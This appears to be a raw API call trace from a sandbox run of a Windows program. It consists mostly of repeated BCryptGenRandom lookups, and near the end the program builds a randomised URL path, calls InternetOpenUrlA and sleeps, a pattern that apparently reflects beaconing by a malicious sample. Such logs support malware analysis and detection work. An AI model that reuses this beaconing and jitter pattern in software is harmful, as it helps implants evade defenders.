0x7ffc5bcc36b0 [0213.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.791] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.792] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0215.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022f2, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a022f2) returned 0x0 [0215.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0215.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.277] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.278] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.279] GetProcessHeap () returned 0x440000 [0215.279] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0215.280] lstrcpyA (in: lpString1=0x472b10, lpString2="P\" \x03" | out: lpString1="P\" \x03") returned="P\" \x03" [0215.280] lstrcatA (in: lpString1="P\" \x03", lpString2="/Yd0qAfcq8yt0ouqyvdbgBvfosY436Ff1Hi9j9aXdd96onl/NppytsYhg0Xjzpbznve3dk0fmtICrfcsQd/pmAHshci7qg0qbrru3cgph9ChuiC1aez88ufk0/lXvIq6hziw0xTjz7zf1dzDtkDw35rsu2clklfen/Vp2bwfwzn8vn3j33CAZd9byaavPsPRhgRuv1km/" | out: lpString1="P\" \x03/Yd0qAfcq8yt0ouqyvdbgBvfosY436Ff1Hi9j9aXdd96onl/NppytsYhg0Xjzpbznve3dk0fmtICrfcsQd/pmAHshci7qg0qbrru3cgph9ChuiC1aez88ufk0/lXvIq6hziw0xTjz7zf1dzDtkDw35rsu2clklfen/Vp2bwfwzn8vn3j33CAZd9byaavPsPRhgRuv1km/") returned="P\" \x03/Yd0qAfcq8yt0ouqyvdbgBvfosY436Ff1Hi9j9aXdd96onl/NppytsYhg0Xjzpbznve3dk0fmtICrfcsQd/pmAHshci7qg0qbrru3cgph9ChuiC1aez88ufk0/lXvIq6hziw0xTjz7zf1dzDtkDw35rsu2clklfen/Vp2bwfwzn8vn3j33CAZd9byaavPsPRhgRuv1km/" [0215.281] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0215.281] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P\" \x03/Yd0qAfcq8yt0ouqyvdbgBvfosY436Ff1Hi9j9aXdd96onl/NppytsYhg0Xjzpbznve3dk0fmtICrfcsQd/pmAHshci7qg0qbrru3cgph9ChuiC1aez88ufk0/lXvIq6hziw0xTjz7zf1dzDtkDw35rsu2clklfen/Vp2bwfwzn8vn3j33CAZd9byaavPsPRhgRuv1km/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0215.283] GetProcessHeap () returned 0x440000 [0215.283] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0215.283] GetProcessHeap () returned 0x440000 [0215.283] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02250 | out: hHeap=0x440000) returned 1 [0215.283] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0215.285] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0215.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0215.287] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0215.287] Sleep (dwMilliseconds=0x13da6) [0215.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0215.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0215.739] GetProcessHeap () returned 0x440000 [0215.739] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0215.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0215.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0215.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0215.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b265, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1b265) returned 0x0 [0215.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.744] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.745] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.745] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.746] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.747] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0215.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0215.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0215.748] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0215.748] GetProcAddress 